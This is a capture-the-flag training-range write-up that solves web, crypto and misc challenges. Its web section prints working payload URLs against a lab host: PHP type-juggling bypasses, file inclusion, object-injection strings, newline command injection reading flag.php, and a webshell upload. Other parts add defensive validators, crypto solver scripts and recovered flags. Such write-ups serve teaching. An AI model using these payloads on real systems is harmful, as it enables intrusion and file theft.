20231211 CTF Training Range Writeup

December 14, 2023

Web

1. php_weak_1

<!-- 
define('FLAG','flag{xxxxxx}');
if(@strcmp($_GET['flag'], FLAG) == 0 ){
	echo "success, flag:".FLAG;
}

The flag parameter is taken from GET and compared with the real flag. Passing an array (flag[]=0) makes strcmp() return NULL instead of an integer, and NULL == 0 is true, so the comparison passes and the flag is printed. (PHP 8 throws a TypeError here instead; the array bypass only works on older versions.)

http://222.219.143.29:20031/?flag[]=0

2. php_weak_2

<!--
define('FLAG','flag{xxx}');
if($_GET['s1'] != $_GET['s2'] &&md5($_GET['s1']) == md5($_GET['s2']) ){
	echo "success flag:".FLAG;
}

s1 and s2 are compared through their MD5 digests, which can be bypassed with the MD5 "magic hash" trick:

For example, the four strings 240610708, aabg7XSs, aabC9RqS and s878926199a have these MD5 digests:

240610708:0E462097431906509019562988736854

aabg7XSs:0E087386482136013740957780965295

aabC9RqS:0E041022518165728065344349536299

s878926199a:0E545993274517709034328855841020

When PHP compares two such digests with ==, both sides are numeric strings of the form 0E<digits>, which PHP evaluates as 0 × 10^n = 0; the comparison becomes 0 == 0, which is true, and the check is bypassed.

Likewise, strings whose SHA-1 digest starts with 0E include:

aaroZmOk,aaK1STfy,aaO8zKZF,aa3OFF9m

http://222.219.143.29:20032/?s1=240610708&s2=aabg7XSs

3. lfi_demo

flag in /flag

GET parameter is 'file'

Include the flag file through the file parameter:

http://222.219.143.29:20021/?file=/flag

4. unser-demo

flag in flag.php

<p>flag in flag.php</p>
<?php
show_source(__FILE__);
class example{
        public $test;
        function __destruct(){
                echo show_source($this->test);
        }
}

$f = $_GET['f'];
unserialize($f);
?>

Following the hint, pass a serialized example object through the f parameter with test set to flag.php:

class example{
    public $test;
}

$a=new example();
$a->test="flag.php";
echo serialize($a);   // O:7:"example":1:{s:4:"test";s:8:"flag.php";}

http://222.219.143.29:20040/?f=O:7:"example":1:{s:4:"test";s:8:"flag.php";}

5. exec_1

<?php
    $target = $_REQUEST[ 'ip' ];
    $target=trim($target);
    $substitutions = array(
        '&'  => '',
        ';' => '',
        '|' => '',
        '-'  => '',
        '$'  => '',
        '('  => '',
        ')'  => '',
        '`'  => '',
        '||' => '',
    );
    $target = str_replace( array_keys( $substitutions ), $substitutions, $target );
    
    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
        $cmd = shell_exec( 'ping  ' . $target );
    }
    else {
        $cmd = shell_exec( 'ping  -c 1 ' . $target );
    }

    echo  "<pre>{$cmd}</pre>";
    highlight_file(__FILE__);     

?>

Commands are passed in through the ip parameter. Because both the semicolon and the space are filtered, %0a or %0d can be used in place of the semicolon, and < or <> in place of the space.

http://222.219.143.29:20050/?ip=127.0.0.1%0als

This reveals flag.php:

http://222.219.143.29:20050/?ip=127.0.0.1%0acat%3Cflag.php

The flag is in the returned source.
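To see why the blacklist fails and what an allowlist looks like, here is an added Python model (not the challenge's code) of the str_replace() table above, next to an ipaddress-based validator; the token table and the sample inputs are taken from this section.

```python
import ipaddress

# The challenge's blacklist, reproduced from the PHP str_replace() table above.
SUBSTITUTIONS = {"&": "", ";": "", "|": "", "-": "", "$": "", "(": "", ")": "", "`": "", "||": ""}

def blacklist_filter(target: str) -> str:
    """Mirror of the page's filter: trim, then strip each listed token, nothing else."""
    target = target.strip()
    for bad, repl in SUBSTITUTIONS.items():
        target = target.replace(bad, repl)
    return target

# Bytes that let a shell start a new command or separate arguments, none of which the
# blacklist touches: LF and CR end the current command, '<' and '<>' act as separators.
UNFILTERED_METACHARS = ["\n", "\r", "<", ">"]

def survives_blacklist(target: str) -> list:
    """Which dangerous characters are still present after the blacklist has run."""
    cleaned = blacklist_filter(target)
    return [c for c in UNFILTERED_METACHARS if c in cleaned]

def is_valid_ping_target(target: str) -> bool:
    """Allowlist replacement: accept only a syntactically valid IPv4/IPv6 literal."""
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        return False
```

Blacklists enumerate what the author remembered; the allowlist rejects anything that is not a bare address, which covers the newline and redirection tricks without needing to know them.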

6. unser_1


<!-- 
class just4fun {
    var $enter;
    var $secret;
}

if (isset($_GET['pass'])) {
    $pass = $_GET['pass'];

    if(get_magic_quotes_gpc()){
        $pass=stripslashes($pass);
    }

    $o = unserialize($pass);

    if ($o) {
        $o->secret = "*";
        if ($o->secret === $o->enter)
            echo "Congratulation! Here is my secret: ".$o->secret;
        else 
            echo "Oh no... You can't fool me";
    }
    else echo "are you trolling?";
}
-->

secret is compared with enter and the secret is printed when they match. Since we don't know what value secret will be assigned, make enter a reference to secret so the two always stay identical.


class just4fun {
    var $enter;
    var $secret;
}
$a = new just4fun();
$a->enter=&$a->secret;   // enter becomes a reference to secret
echo serialize($a);

http://222.219.143.29:20041/?pass=O:8:"just4fun":2:{s:5:"enter";N;s:6:"secret";R:2;}

7. php_weak_3

<?php
include 'flag.php';
show_source(__FILE__);
if(isset($_GET['a']) && isset($_POST['b']) && isset($_COOKIE['c'])){
    $v1 = $_GET['a'];
    $v2 = $_POST['b'];
    $v3 = $_COOKIE['c'];
    if($v1 != $v2 && md5($v1) == md5($v2)){
        if(!strcmp($v3,$flag))
            echo $flag;
    }
}
?>

a and b are again compared through MD5, and c is compared with the flag using strcmp; use the array bypass for c.

Set the cookie in Postman to get the flag.

8. unser_2

<?php  
@error_reporting(1); 
include 'flag.php';
class baby 
{   
    public $file;
    function __toString()      
    {          
        if(isset($this->file)) 
        {
            $filename = "./{$this->file}";        
            if (file_get_contents($filename))         
            {              
                return file_get_contents($filename); 
            } 
        }     
    }  
}  
if (isset($_GET['data']))  
{ 
    $data = $_GET['data'];
    preg_match('/[oc]:\d+:/i',$data,$matches);
    if(count($matches))
    {
        die('Hacker!');
    }
    else
    {
        $good = unserialize($data);
        echo $good;
    }     
} 
else 
{ 
    highlight_file("./index.php"); 
} 
?>

Pass a serialized baby object through data; echoing it prints the contents of file, so set file to flag.php per the hint. The regular expression matches the leading O:<digits>, so put a plus sign in front of the digit to slip past it; the payload needs to be URL-encoded.

http://222.219.143.29:20042/?data=O:%2B4:"baby":1:{s:4:"file";s:10:"./flag.php";}
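The regex in unser_2 and the reference trick in unser_1 both show how fragile pattern checks on serialized data are. Here is an added Python inspector (not the challenge's code, and a token scan rather than a full parser) that recognises the signed-length form and reference tokens; the sample payloads are the ones from these two sections.

```python
import re

# Sample payloads in the shapes discussed above (copied from the writeup).
SAMPLES = {
    "plain_object": 'O:7:"example":1:{s:4:"test";s:8:"flag.php";}',
    "reference": 'O:8:"just4fun":2:{s:5:"enter";N;s:6:"secret";R:2;}',
    "plus_sign": 'O:+4:"baby":1:{s:4:"file";s:10:"./flag.php";}',
    "scalar": 's:5:"hello";',
}

NAIVE_FILTER = re.compile(r'[oc]:\d+:', re.I)   # the check used by unser_2

def naive_filter_blocks(payload: str) -> bool:
    """True when the challenge's own regex would reject the payload."""
    return bool(NAIVE_FILTER.search(payload))

def inspect_serialized(payload: str) -> dict:
    """Summarise object and reference tokens in a PHP serialized string."""
    info = {"classes": [], "references": 0, "plus_sign": False}
    # O:<len>:"<class>":  -- unserialize() accepts an optional sign before the length,
    # which is exactly what the naive \d+ check does not anticipate.
    for m in re.finditer(r'[OC]:([+-]?)(\d+):"([^"]*)":', payload):
        sign, length, name = m.groups()
        if sign:
            info["plus_sign"] = True
        if int(length) == len(name):
            info["classes"].append(name)
    # R:n; / r:n; tokens make one property alias another, as in unser_1.
    info["references"] = len(re.findall(r'\b[Rr]:\d+;', payload))
    return info

def hardened_filter_blocks(payload: str) -> bool:
    """Reject any payload that instantiates an object or carries a reference."""
    info = inspect_serialized(payload)
    return bool(info["classes"]) or info["references"] > 0
```

The real fix is not a better regex but never feeding user input to unserialize(); a JSON format, or unserialize() with allowed_classes set to false, removes the object-instantiation path entirely.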

9. lfi_2

Clicking through the page shows that its links contain a file inclusion:

http://222.219.143.29:20023/?filename=include%2Ffile1.php&submit=%26%2325552%3B%26%2320132%3B

Test with the php://filter stream:

http://222.219.143.29:20023/?filename=php://filter/convert.base64-encode/resource=index.php&submit=%26%2325552%3B%26%2320132%3B

Decoding the output gives a hint; pass it as the filename value.

#flag:/tmp/flllllaag.txt

10. unser_3


you are not admin !  
<!--
$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];
 
if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){
    echo "hello admin!<br>";
    include($file); //class.php
}else{
    echo "you are not admin ! ";
}
-->

First, reading user through file_get_contents has to yield the exact string "the user is admin", so use the php://input stream and send that string in the request body. There is also an include(); passing class.php through file directly does not load anything useful, so read its source through the php://filter stream:

/?user=php://input&file=php://filter/convert.base64-encode/resource=class.php

<?php

class Read{//f1a9.php

    public $file;

    public function __toString(){

        if(isset($this->file)){

            echo file_get_contents($this->file);

        }

        return "__toString was called!";

    }

}

?>

Deserialize a Read object with file set to f1a9.php to get the flag:

/?user=php://input&file=class.php&pass=O:4:"Read":1:{s:4:"file";s:8:"f1a9.php";}

11. unser_4

Not done yet.

12. up-lfi

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Document</title>
</head>
<body>
<p>flag不在这</p>
    <!-- include.php -->
</body>
</html>

Following the hint, visit http://222.219.143.29:20022/include.php, which gives a new hint, Tips: the parameter is file! :), and the page source also reveals upload.php. Including it shows a file-upload button; upload a one-line PHP webshell, connect with AntSword, and read the flag.

Crypto

1. 贝斯 (Base)

TVpXR0NaMzNHWTNUS04zREhCVERLTVpTTVJTVEVPQlNHWlNHQ05KWE1JWUdJTVpSTUlZVE9ZVENNRTJIMj09PQ==

Decode as base64, then base32, to get the flag.

2. 一只小羊跳过了3个栅栏 (A little lamb jumped over 3 fences)

Ciphertext: f{a5369d64lg7c8896e639f13652}a06ff04c8

Decoding with a 3-rail rail-fence cipher gives the flag.

3. Xor_1

Encryption formula: c = m ^ key. Known: c = "cidb~c4wvqZvq`<$$x", key = 5. Find m.

Just XOR it back:

c="cidb~c4wvqZvq`<$$x"
res=""
for i in c:
    # print(i)
    res+=chr(ord(i) ^ 5)
print(res)

4. 不仅仅是base (Not just base)


The challenge is a long base64 blob; decoding it gives a sequence of decimal values.


Converting the decimal values to characters gives a base32 string.


Decoding the base32 gives a brainfuck program.


Running the brainfuck program gives the flag.

5. 套娃 (Nesting dolls)


The challenge is a hex string; splitting it into pairs and converting the hex to ASCII gives a base32 string.


Decoding the base32 gives base64.


Decoding the base64 gives a run of \x-escaped hex bytes.


Converting those hex bytes to characters gives another hex string; converting that to characters in turn gives a brainfuck program.


Running the brainfuck program gives the flag.

6. 降龙十八掌 (The Eighteen Dragon-Subduing Palms)

Young warrior, you have exceptional bones; let me pass on to you the Eighteen Dragon-Subduing Palms!

The ciphertext is a long run of Buddhist-sutra characters. Decrypting it with 与佛论禅 ("Talk with Buddha") gives:

MzkuM8fmZTL7MJH6LGIxBJV7L7V6ZJR5BJMyLGN7LzRkAwL7MU5=

Base decoding this directly fails; given the "eighteen" in the title, apply ROT18 first:

ZmxhZ3szMGY2ZWU1YTVkOWI2Y2I1MWE0OWZlYTA2YmExNjY2ZH0=

Then base64 decoding gives the flag.

7. RSA1

In an RSA key-pair generation, suppose p=473398607161, q=4511491, e=17. Solve for d. The MD5 of d is the flag.

Compute d with RSA Tools.

8. 贝斯? (Base?)

..--..--..-..---..----.-..--...-....-..-.--...--..-....-...-...-.-.....-....--.-..-....-...-.-.-.-.....-..-.-..-..-...---..-----...-...-.-.....-..---.---..---.-..-...--.-.....--..--.--.-.....-..----.--..-.-.-..---..-..-.--.-..-.--.-.....-.

There are no separators, so it cannot be decoded as Morse. Map the symbols to 0 and 1, convert the binary to hex, then the hex to ASCII to get the flag.

9. RAS

p = 0x3B6311745B1BD50F111D171CC1D5A7FBBFABCBB
q = 0x2B5FDF7118A38EFB3B4F2A0D4E6130E520DD2F9
e = 0x1224B6ADFDD2F4C4350713196000258F5C7D193FACE19E484E027BA4351B796523DF4DCB2CAE5
c = [
0x268BDF69E55B075E519108349569B951FD7FA62B0D9088B476BB66D5CB04630F525CD2B33A3F3,
0x6A1E9C448AD5742B8FCF4F73179C3D1614263000B85EC499BC9E941C95703B8DD7CC21EA77975,
0x7BB14144E91EC9106B1C5CD878F507A07FFAEE4B7B092271DEAA7E5B6EF47FB3FA84425F6D375,
0x8E6D08C60928CA8A65FC971E24C80F256678F476BD2DB28D7174E398C0D81EBF8A20C1FB76B9D,
0x529D680E0851D069FBDF74E81CF20B369CEC53238486C106E0CC0E8741E6C25814DD4ECB28047,
0x805AD716FD54C6FA0D9A162B30055B1C469E37AF7D77C5A71532320AAF47F300C95619A6CCA21,
0x51585D5C3733CE1FA91F7E8722C0A29934B8B12C98B634AABFD126AC2BED5C1A5754EB3A5276D,
0x8B4AC0EF0669E4DFA2E24F96528BCFB8168566FD5FB2DCC1E9DE413DA768258E759C9A073D832,
0x74CCD34986604C0305D16FE7FEB7D40C757990DBCFBBC97E8A8C21A266EAD33E9245ABE8EDF9B,
0x51585D5C3733CE1FA91F7E8722C0A29934B8B12C98B634AABFD126AC2BED5C1A5754EB3A5276D,
0x8B4AC0EF0669E4DFA2E24F96528BCFB8168566FD5FB2DCC1E9DE413DA768258E759C9A073D832,
0x74CCD34986604C0305D16FE7FEB7D40C757990DBCFBBC97E8A8C21A266EAD33E9245ABE8EDF9B,
0x805AD716FD54C6FA0D9A162B30055B1C469E37AF7D77C5A71532320AAF47F300C95619A6CCA21,
0x673A6BEB5E9AFD0BABB9D3D088C226B4FA1D23ADAECC74E2EF45DCEB9C3949E0456188D41F973,
0x8B4AC0EF0669E4DFA2E24F96528BCFB8168566FD5FB2DCC1E9DE413DA768258E759C9A073D832,
0x92B1493A164638E670FE0CB043FC253FCAEAD763776FCBDF987E54AE894DFCC13692BBEE9C29,
0x51585D5C3733CE1FA91F7E8722C0A29934B8B12C98B634AABFD126AC2BED5C1A5754EB3A5276D,
0x8B4AC0EF0669E4DFA2E24F96528BCFB8168566FD5FB2DCC1E9DE413DA768258E759C9A073D832,
0x51585D5C3733CE1FA91F7E8722C0A29934B8B12C98B634AABFD126AC2BED5C1A5754EB3A5276D,
0x8B4AC0EF0669E4DFA2E24F96528BCFB8168566FD5FB2DCC1E9DE413DA768258E759C9A073D832,
0x805AD716FD54C6FA0D9A162B30055B1C469E37AF7D77C5A71532320AAF47F300C95619A6CCA21,
0x673A6BEB5E9AFD0BABB9D3D088C226B4FA1D23ADAECC74E2EF45DCEB9C3949E0456188D41F973,
0x51585D5C3733CE1FA91F7E8722C0A29934B8B12C98B634AABFD126AC2BED5C1A5754EB3A5276D,
0x51585D5C3733CE1FA91F7E8722C0A29934B8B12C98B634AABFD126AC2BED5C1A5754EB3A5276D,
0x673A6BEB5E9AFD0BABB9D3D088C226B4FA1D23ADAECC74E2EF45DCEB9C3949E0456188D41F973,
0x92B1493A164638E670FE0CB043FC253FCAEAD763776FCBDF987E54AE894DFCC13692BBEE9C29,
0x7C04B76E88FDF069BB729410E91792BA182F4CFAA5D2FA7A7829BD9740B78E664C12A784949F0,
]

p and q are known: compute d first, then decrypt each c to get the flag.
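The same computation serves RSA1 (d from p, q, e) and RAS (d, then m = c^d mod n per block). This is an added Python example, not the author's tooling; p, q and e are the values from the two challenges, and only the first c value of RAS is repeated here as a sample (pass the full list from the statement to decrypt everything).

```python
import hashlib
from math import gcd

# p, q and e from the RSA1 and RAS challenges above.
RSA1 = dict(p=473398607161, q=4511491, e=17)
RAS = dict(
    p=0x3B6311745B1BD50F111D171CC1D5A7FBBFABCBB,
    q=0x2B5FDF7118A38EFB3B4F2A0D4E6130E520DD2F9,
    e=0x1224B6ADFDD2F4C4350713196000258F5C7D193FACE19E484E027BA4351B796523DF4DCB2CAE5,
)
# First ciphertext block of RAS; append the remaining values from the challenge.
RAS_BLOCKS = [0x268BDF69E55B075E519108349569B951FD7FA62B0D9088B476BB66D5CB04630F525CD2B33A3F3]

def rsa_private_exponent(p: int, q: int, e: int) -> int:
    """d = e^-1 mod (p-1)(q-1); raises ValueError if e is not invertible."""
    phi = (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e shares a factor with phi(n); no private exponent exists")
    return pow(e, -1, phi)   # modular inverse, Python 3.8+

def int_to_bytes(m: int) -> bytes:
    return m.to_bytes((m.bit_length() + 7) // 8, "big") if m else b"\x00"

def decrypt_blocks(blocks, d: int, n: int) -> bytes:
    """Apply m = c^d mod n to each block and concatenate the plaintext bytes."""
    return b"".join(int_to_bytes(pow(c, d, n)) for c in blocks)

def solve(params: dict, blocks) -> tuple:
    d = rsa_private_exponent(params["p"], params["q"], params["e"])
    return d, decrypt_blocks(blocks, d, params["p"] * params["q"])

if __name__ == "__main__":
    d1 = rsa_private_exponent(**RSA1)
    print("RSA1 d =", d1)
    print("RSA1 flag = md5(d) =", hashlib.md5(str(d1).encode()).hexdigest())
    d2, plain = solve(RAS, RAS_BLOCKS)
    print("RAS plaintext:", plain)
```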

10. 变异的凯撒 (Mutant Caesar)

Ciphertext: afZ_r[[X+*(ShTRdOO`ZLJHRYNLLAOM?=;Q;AS

A one-click Caesar decoder gives the flag at key3 #5.

11. Xor_2

The challenge itself seems to be broken; will update later.

12. 凯撒?替换?呵呵! (Caesar? Substitution? Ha!)

MTHJ{CUBCGXGUGXWREXIPOYAOEYFIGXWRXCHTKHFCOHCFDUCGTXZOHIXOEOWMEHZO}

Frequency analysis at https://quipqiup.com/ breaks it directly:

flag substitution cipher decryption is always easy just like a piece of cake

13. 奇怪的指令 (Strange orders)

The following is an order issued by the sitting president of a certain country, encrypted in a peculiar, patternless way; analysis is the only option. Restore it to a readable sentence and find the key in it to submit as the answer. The answer is 32 characters and contains lowercase letters.

VIZZB IFIUOJBWO NVXAP OBC XZZ UKHVN IFIUOJBWO HB XVIXW XAW VXFI X QIXN VBD KQ IFIUOJBWO WBKAH NBWXO VBD XJBCN NKG QLKEIU DI XUI VIUI DKNV QNCWIANQ XN DXPIMKIZW VKHV QEVBBZ KA XUZKAHNBA FKUHKAKX XAW DI VXFI HBN QNCWIANQ NCAKAH KA MUBG XZZ XEUBQQ XGIUKEX MUBG PKAWIUHXUNIA NVUBCHV 12NV HUXWI XAW DI XUI SCQN QB HZXW NVXN XZZ EBCZW SBKA CQ NBWXO XAW DI DXAN NB NVXAP DXPIMKIZW MBU JIKAH QCEV XA BCNQNXAWKAH VBQN HKFI OBCUQIZFIQ X JKH UBCAW BM XLLZXCQI XAW NVI PIO KQ 640I11012805M211J0XJ24MM02X1IW09

Again with quipqiup:

HELLO EVERYBODY THANK YOU ALL RIGHT EVERYBODY GO AHEAD AND HAVE A SEAT HOW IS EVERYBODY DOING TODAY HOW ABOUT TIM SPICER WE ARE HERE WITH STUDENTS AT WAKEFIELD HIGH SCHOOL IN ARLINGTON VIRGINIA AND WE HAVE GOT STUDENTS TUNING IN FROM ALL ACROSS AMERICA FROM KINDERGARTEN THROUGH 12TH GRADE AND WE ARE JUST SO GLAD THAT ALL COULD JOIN US TODAY AND WE WANT TO THANK WAKEFIELD FOR BEING SUCH AN OUTSTANDING HOST GIVE YOURSELVES A BIG ROUND OF APPLAUSE AND THE KEY IS 640E11012805F211B0AB24FF02A1ED09

14. AES—mess

We encrypted a flag with AES-ECB encryption using a secret key, and got the hash: e220eb994c8fc16388dbd60a969d4953f042fc0bce25dbef573cf522636a1ba3fafa1a7c21ff824a5824c5dc4a376e75 However, we lost our plaintext flag and also lost our key and we can't seem to decrypt the hash back :(. Luckily we encrypted a bunch of other flags with the same key. Can you recover the lost flag using this?

[HINT] There has to be some way to work backwards, right?

Compare the given ciphertext with the other encrypted flags to recover the lost one.

Split the hex into 32-character (16-byte) blocks:

e220eb994c8fc16388dbd60a969d4953
f042fc0bce25dbef573cf522636a1ba3
fafa1a7c21ff824a5824c5dc4a376e75

Look up each block in the other ciphertexts to find the 16 plaintext characters it corresponds to:

abctf{looks_like_gospel_feebly}:e220eb994c8fc16388dbd60a969d4953   6d896bd7d6da9c4ce3eac5e4832c2f64

abctf{verism_evg_you_can_break_ajugas}:528c30c67c57968fa131684d07c1fa9cf042fc0bce25dbef573cf522636a1ba3c0bd6ceeec8e817f1be7b09a9a8b0fb8

abctf{eocene_fazes}:b58b970036b3a521a314d06f1436863efafa1a7c21ff824a5824c5dc4a376e75

Stitching the matching plaintext blocks together gives the flag: abctf{looks_like_you_can_break_aes}
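The block matching above is ECB's defining weakness: under one key, equal plaintext blocks give equal ciphertext blocks, so known pairs form a codebook. Here is an added Python implementation (not the challenge's code) that builds that codebook from the three pairs listed above and reads the target ciphertext through it.

```python
# Known (plaintext, ciphertext-hex) pairs from the challenge, all encrypted under the same key.
KNOWN = [
    ("abctf{looks_like_gospel_feebly}",
     "e220eb994c8fc16388dbd60a969d49536d896bd7d6da9c4ce3eac5e4832c2f64"),
    ("abctf{verism_evg_you_can_break_ajugas}",
     "528c30c67c57968fa131684d07c1fa9cf042fc0bce25dbef573cf522636a1ba3c0bd6ceeec8e817f1be7b09a9a8b0fb8"),
    ("abctf{eocene_fazes}",
     "b58b970036b3a521a314d06f1436863efafa1a7c21ff824a5824c5dc4a376e75"),
]
# The ciphertext whose plaintext was lost.
TARGET = "e220eb994c8fc16388dbd60a969d4953f042fc0bce25dbef573cf522636a1ba3fafa1a7c21ff824a5824c5dc4a376e75"

BLOCK = 16   # AES block size in bytes = 32 hex characters

def hex_blocks(h: str) -> list:
    return [h[i:i + 2 * BLOCK] for i in range(0, len(h), 2 * BLOCK)]

def build_codebook(pairs) -> dict:
    """ECB is a codebook: the same 16-byte plaintext block always maps to the same ciphertext block."""
    book = {}
    for plain, cipher in pairs:
        for i, cblock in enumerate(hex_blocks(cipher)):
            # The last block is shorter than 16; PKCS#7 padding is not part of the flag text.
            pblock = plain[i * BLOCK:(i + 1) * BLOCK]
            if cblock in book and book[cblock] != pblock:
                raise ValueError("one ciphertext block with two plaintexts: not ECB under a single key")
            book[cblock] = pblock
    return book

def recover(target_hex: str, pairs) -> tuple:
    """Translate each target block through the codebook; unknown blocks become '?' * 16."""
    book = build_codebook(pairs)
    out, missing = [], []
    for cblock in hex_blocks(target_hex):
        if cblock in book:
            out.append(book[cblock])
        else:
            out.append("?" * BLOCK)
            missing.append(cblock)
    return "".join(out), missing
```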

15. AES

c = YC0ky5H1iE/1yvolTcavHPt8cla5DakNyXBlET1QXbnxQm3u7VVHlZjUc5XzVH6grI5HOoYPab0v\neu/TDaAPtg==
key = ThisIsASecretKey
c = AES.ecb(key,flag)

Decrypt with AES-ECB.

16. 猜猜我是谁 (Guess who I am)

LQGSK6GUJWNAK4GOJMIIG=J2NWURVU5MJWEMJUZ25TA=WC2SYDMLKCVLYSGLWKMS6=X2GEUHX2GOT2ENUXVNTYQ=

The string divides evenly into four parts, so try a 4-rail fence.

With 4 rails the result is: LJWXQ2C2GN2GSWSEKUYU6RDHGVMXUUL2J5KGWMCONJVTAWL2KEYE4MSNGJGUOULXJZWVM2KNI5MTITSYGA6Q====

Decoding as base32 and then base64 gives the flag.

17. des-ecb

To do.

18. crpher

ciphertext.encode('hex') = 1f1a100d1e5c504d1e425d10424e561e0a575e5314570b4557050a584c12545b421b50584344524e5312

ciphertext[x] = flag[x] ^ key[x]

enc(key,iv) = rhiknfxeuyhlcresrvblabmmdppntznqzwqijjnvgo

key tips :
enc function is similar to Virginia;
The length of iv is 5;
iv consists of 5 charcters c,r,y,p,t

The IV is a vector of the five letters c, r, y, p, t, and encrypting the key with it yields the given string. Since the flag starts with the fixed prefix flag{, XORing it with the first five ciphertext bytes 1f 1a 10 0d 1e gives the first five key characters: yvqje

text=[0x1f,0x1a,0x10,0x0d,0x1e]
flag="flag{"
temp=""
for i in range(0,5):
    temp+=chr(text[i] ^ ord(flag[i]))
print(temp)

No arrangement of crypt turns rhikn back into yvqje under Vigenère decryption, so consider the Beaufort cipher instead; with it the IV works out to pcytr.

The recovered key is yvqjekfuztirwcnxldsgpbmhoanlascmzxbhtpgwjo

XOR to get the answer:

text=[0x1f,0x1a,0x10,0x0d,0x1e,0x5c,0x50,0x4d,0x1e,0x42,0x5d,0x10,0x42,0x4e,0x56,0x1e,0x0a,0x57,0x5e,0x53,0x14,0x57,0x0b,0x45,0x57,0x05,0x0a,0x58,0x4c,0x12,0x54,0x5b,0x42,0x1b,0x50,0x58,0x43,0x44,0x52,0x4e,0x53,0x12]

flag=""
key="yvqjekfuztirwcnxldsgpbmhoanlascmzxbhtpgwjo"
for i in range(0,len(key)):
    flag+=chr(text[i]^ord(key[i]))
print(flag)
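The whole chain (known-plaintext XOR to get the key prefix, deriving the IV under Beaufort and checking it against the c,r,y,p,t hint, then recovering the full key and the flag) as one added Python example, not the author's script; every constant is from the challenge statement above.

```python
# Values from the challenge statement.
CIPHERTEXT = bytes.fromhex(
    "1f1a100d1e5c504d1e425d10424e561e0a575e5314570b4557050a584c12545b421b50584344524e5312")
ENC_KEY = "rhiknfxeuyhlcresrvblabmmdppntznqzwqijjnvgo"   # enc(key, iv)
IV_LETTERS = "crypt"
KNOWN_PREFIX = b"flag{"

def key_prefix_from_known_plaintext(ct: bytes, known: bytes) -> str:
    """key[i] = ct[i] ^ flag[i] wherever the flag is known (ciphertext = flag ^ key)."""
    return bytes(c ^ k for c, k in zip(ct, known)).decode()

def beaufort_encrypt(plain: str, iv: str) -> str:
    # Beaufort: c = (iv - p) mod 26, iv repeated; Vigenere would be c = (p + iv) mod 26.
    return "".join(chr((ord(iv[i % len(iv)]) - ord(p)) % 26 + 97) for i, p in enumerate(plain))

def beaufort_decrypt(cipher: str, iv: str) -> str:
    # Beaufort is an involution: p = (iv - c) mod 26, the same operation again.
    return beaufort_encrypt(cipher, iv)

def find_iv(enc_key: str, key_prefix: str, letters: str) -> str:
    """Under Beaufort, iv[i] = key[i] + enc[i] (mod 26); the hint says the IV is an arrangement of `letters`."""
    iv = "".join(chr((ord(k) + ord(c) - 2 * 97) % 26 + 97) for k, c in zip(key_prefix, enc_key))
    if sorted(iv) != sorted(letters):
        raise ValueError(f"derived iv {iv!r} is not an arrangement of {letters!r}")
    return iv

def recover_flag(ct: bytes = CIPHERTEXT, enc_key: str = ENC_KEY) -> tuple:
    prefix = key_prefix_from_known_plaintext(ct, KNOWN_PREFIX)   # "yvqje"
    iv = find_iv(enc_key, prefix, IV_LETTERS)                     # "pcytr"
    key = beaufort_decrypt(enc_key, iv)                           # full 42-character key
    flag = bytes(c ^ ord(k) for c, k in zip(ct, key)).decode()
    return iv, key, flag

if __name__ == "__main__":
    print(recover_flag())
```

Trying the Vigenère relation (iv = c - p) on the same prefix gives a second letter of m, which is not in crypt, which is exactly why the writeup switched to Beaufort.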

19. ezsm

# -*- coding: utf-8 -*-
import binascii
from gmssl import sm4
from secret import flag

def encode(key, data):
    sm4_a = sm4.CryptSM4()
    sm4_a.set_key(key.encode(), sm4.SM4_ENCRYPT)
    ciphertext = sm4_a.crypt_ecb(str(data).encode()).hex()
    return ciphertext

if __name__ == '__main__':
    key = '4765?df?0170?44?'
    ciphertext = encode(key,flag)
    print('密文',ciphertext)


#c49f4552b22f27969c07d9371d1aa093b54f97ccd44261a5fc92cd3461a38d68d20218a51686a3f9d0cc50679e36cd4f

Four positions of the key are unknown; try every candidate character in each position in code and search the decryptions for the flag keyword.

from gmssl import sm4
from Crypto.Util.number import long_to_bytes

def encode(key, data):
    sm4_a = sm4.CryptSM4()
    sm4_a.set_key(key.encode(), sm4.SM4_ENCRYPT)
    ciphertext = sm4_a.crypt_ecb(str(data).encode()).hex()
    return ciphertext

def decode(key, data):
    sm4_a = sm4.CryptSM4()
    sm4_a.set_key(key.encode(), sm4.SM4_DECRYPT)
    text = sm4_a.crypt_ecb(long_to_bytes(data))
    return text

if __name__ == '__main__':
    # the known key characters are lowercase hex digits, so try all 16 in each slot (16^4 keys);
    # the original list left out 'e', which would miss the key if that digit appears
    l = '0123456789abcdef'
    ciphertext = 0xc49f4552b22f27969c07d9371d1aa093b54f97ccd44261a5fc92cd3461a38d68d20218a51686a3f9d0cc50679e36cd4f
    for i in l:
        for n in l:
            for m in l:
                for j in l:
                    key = f'4765{i}df{n}0170{m}44{j}'
                    text = decode(key, ciphertext)
                    if b'flag{' in text:
                        print(key, text)

20. 这里什么都没有 (There's nothing here)

The Word document's properties contain the hint 3DES-ECB.

key:deluipuhgfnbcxsw

Ciphertext: 2qnss1sp48698op36o2q343sps9o7p0690s4r9s560or51qsnrqopsn8592439pno63695072qos1p3r

Decrypt with an online tool to get the flag: https://the-x.cn/cryptography/TripleDes.aspx

Misc

1. wireshark

An attacker captured, with Wireshark, the traffic of an administrator logging in to a website (the administrator's password is the answer). Note: the flag is submitted as flag{xxx}.

Search for password.

2. logon

The administrator's login was captured; can you recover the login password from it? Note: the administrator's password is the flag.

Search for password, then URL-decode it.

3. ping

The administrator captured some ping traffic on the network; can you help him extract the flag from it?

Each request ends with one character; concatenate them.

4. telnet

The administrator captured some traffic; can you find the flag in it?

Search for flag.

5. sublime

Search for flag directly and URL-decode it.

6. meinv.jpg

Can you find the information hidden in the image?

The information is in the file properties.

7. Fonts

Opening the file in a text editor reveals the flag.

8. 眼见非实 (Seeing is not believing)

After unzipping, the flag is in the XML file.

9. ameng.jpg

The cat is sighing; can you find out why?

StegSolve shows that the image has a second frame.

10. goodguys

Open it in 010 Editor; the flag is at the end of the file.

11. blue

The red-blue battle begins.

Per the title, extract the data from the blue channel to get the flag.

12. Virtual

Archive example: the password obtained by a mask attack is the answer.

Per the hint a mask attack is needed; view the end of the file in 010 Editor to get the mask, then brute-force.

13. sound

View the spectrogram to get the flag.

14. 提取 (Extraction)

An attacker used a file transfer to move key material; find the key the attacker transferred. Note: the flag is submitted as flag{xxx}

